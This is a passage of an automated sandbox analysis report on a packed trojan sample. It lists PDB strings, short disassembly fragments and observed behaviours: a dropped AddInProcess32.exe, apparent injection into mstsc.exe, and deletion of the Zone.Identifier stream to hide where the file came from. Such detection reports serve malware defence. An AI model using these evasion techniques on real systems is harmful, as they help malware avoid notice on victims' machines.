          Source: Binary string: bcrypt.pdbn source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
          Source: Binary string: cldapi.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: Windows.UI.Shell.pdbqS source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: dxgi.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: IconCodecService.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: dlnashext.pdbIj source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: WLIDProv.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: UxTheme.pdb source: WerFault.exe, 0000000A.00000003.731495333.000001EDC6EB3000.00000004.00000001.sdmp
          Source: Binary string: rsaenh.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: SettingSyncPolicy.pdbQSx source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: winsta.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: sfc_os.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: Windows.Security.Authentication.Web.Core.pdb source: WerFault.exe, 0000000A.00000003.747586781.000001EDC805E000.00000004.00000001.sdmp
          Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
          Source: Binary string: TaskFlowDataEngine.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: WscApi.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: Windows.StateRepositoryBroker.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: Windows.StateRepository.pdb%St source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: ucrtbase.pdb8 source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: davclnt.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: stobject.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: CoreMessaging.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
          Source: Binary string: AppResolver.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: dcomp.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: NPSM.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: audioses.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: twinui.appcore.pdbUSd source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: ntmarta.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: UxTheme.pdb0 source: WerFault.exe, 0000000A.00000003.731495333.000001EDC6EB3000.00000004.00000001.sdmp
          Source: Binary string: sapi_onecore.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: ninput.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: StartTileData.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
          Source: Binary string: PortableDeviceTypes.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
          Source: Binary string: LanguageOverlayUtil.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: kernel32.pdb source: WerFault.exe, 0000000A.00000003.740772791.000001EDC777B000.00000004.00000001.sdmp
          Source: Binary string: netprofm.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: sxs.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: pnidui.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: Windows.Internal.Shell.Broker.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: win32u.pdb source: WerFault.exe, 0000000A.00000003.739016455.000001EDC6E52000.00000004.00000001.sdmp
          Source: Binary string: ResourcePolicyClient.pdbMS source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: MrmCoreR.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: thumbcache.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: PhotoMetadataHandler.pdb]Sl source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: srvcli.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: ntdll.pdb0 source: WerFault.exe, 0000000A.00000003.740856862.000001EDC6DF0000.00000004.00000001.sdmp
          Source: Binary string: ExplorerFrame.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: imm32.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: twinui.pcshell.pdb!SH source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: cdp.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: profapi.pdba source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
          Source: Binary string: InputHost.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: ExplorerFrame.pdbmS< source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: ntshrui.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: coml2.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: drprov.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: IdStore.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: wpnapps.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: PortableDeviceApi.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: UserMgrProxy.pdbSP source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 00000001.00000002.722744884.0000000001290000.00000040.00000001.sdmp, mstsc.exe, 00000006.00000002.1032811979.0000000004750000.00000040.00000001.sdmp
          Source: Binary string: Windows.Shell.BlueLightReduction.pdb source: WerFault.exe, 0000000A.00000003.747586781.000001EDC805E000.00000004.00000001.sdmp
          Source: Binary string: TaskFlowDataEngine.pdbeS4 source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: propsys.pdbb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
          Source: Binary string: davhlpr.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: dlnashext.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: Deviceovs.pdb source: WerFault.exe, 0000000A.00000002.761878802.000001EDC4EA8000.00000004.00000020.sdmp
          Source: Binary string: EhStorShell.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: XmlLite.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: AddInProcess32.pdb source: AddInProcess32.exe, mstsc.exe, 00000006.00000002.1034631298.0000000004C7F000.00000004.00000001.sdmp
          Source: Binary string: WorkFoldersShell.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: batmeter.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: cscui.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: DWrite.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: ResourcePolicyClient.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: MFPLAT.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: SyncCenter.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: ApplicationFrame.pdb=SL source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: ncrypt.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: secur32.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: UxTheme.pdbv source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
          Source: Binary string: cryptsp.pdbh source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
          Source: Binary string: netutils.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: kernel32.pdb0 source: WerFault.exe, 0000000A.00000003.726046312.000001EDC6DF6000.00000004.00000001.sdmp
          Source: Binary string: Bcp47Langs.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: WinTypes.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: rtworkq.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: ActionCenter.pdbASh source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: Windows.StateRepositoryClient.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
          Source: Binary string: rpcrt4.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: ExecModelProxy.pdbES source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: shcore.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: explorer.pdb source: WerFault.exe, 0000000A.00000003.725996524.000001EDC6DEA000.00000004.00000001.sdmp
          Source: Binary string: twinui.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: Windows.Internal.Shell.Broker.pdbf source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: NPSMDesktopProvider.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: MMDevAPI.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: Windows.UI.Immersive.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: WPDShServiceObj.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: userenv.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
          Source: Binary string: capauthz.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: CoreUIComponents.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
          Source: Binary string: hcproviders.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: nlaapi.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: setupapi.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: Wer.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: windows.ui.xaml.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: user32.pdb0 source: WerFault.exe, 0000000A.00000003.738993307.000001EDC6E48000.00000004.00000001.sdmp
          Source: Binary string: wincorlib.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: winhttp.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: ntlanman.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: mstsc.pdbGCTL source: AddInProcess32.exe, 00000001.00000002.724998329.0000000002D60000.00000040.00000001.sdmp
          Source: Binary string: IEProxy.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: devobj.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: gdi32full.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
          Source: Binary string: policymanager.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
          Source: Binary string: gdiplus.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: WPDShServiceObj.pdb&uX source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: RmClient.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: StructuredQuery.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: UserMgrProxy.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: d2d1.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: profapi.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
          Source: Binary string: PhotoMetadataHandler.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: SettingSyncPolicy.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: msvcp140.amd64.pdb source: WerFault.exe, 0000000A.00000003.747586781.000001EDC805E000.00000004.00000001.sdmp
          Source: Binary string: WLDP.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: msoshext.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: ES.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: \??\C:\Windows.pdb2R source: WerFault.exe, 0000000A.00000003.746829519.000001EDC4ED0000.00000004.00000001.sdmp
          Source: Binary string: TileDataRepository.pdb-S| source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: fltLib.pdbm source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
          Source: Binary string: Windows.ImmersiveShell.ServiceProvider.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
          Source: Binary string: framedynos.pdbt8 source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: npmproxy.pdb?jO source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: staterepository.core.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
          Source: Binary string: npmproxy.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: msxml6.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: wintrust.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: DataExchange.pdb9S@ source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: twinapi.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
          Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: cryptngc.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: UIAnimation.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: DXP.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: ntdll.pdb source: WerFault.exe, 0000000A.00000003.740856862.000001EDC6DF0000.00000004.00000001.sdmp
          Source: Binary string: wtsapi32.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
          Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: OneCoreUAPCommonProxyStub.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
          Source: Binary string: comctl32.pdb source: WerFault.exe, 0000000A.00000003.729628969.000001EDC6F2D000.00000004.00000001.sdmp
          Source: Binary string: crypt32.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: edputil.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeCode function: 0_2_088189F8 pushad ; retf
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeCode function: 0_2_088189FA push eax; retf
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0041DD78 pushfd ; ret
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_004175C7 push ss; ret
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_00414E16 pushfd ; retf
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0041CEB5 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0041CF6C push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0041CF02 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0041CF0B push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0130D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_047CD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0015DD78 pushfd ; ret
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_001575C7 push ss; ret
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_00154E16 pushfd ; retf
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0015CEB5 push eax; ret
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0015CF02 push eax; ret
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0015CF0B push eax; ret
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0015CF6C push eax; ret
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeFile created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeFile opened: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe\:Zone.Identifier read attributes | delete
          Source: C:\Windows\explorer.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeProcess information set: NOOPENFILEERRORBOX
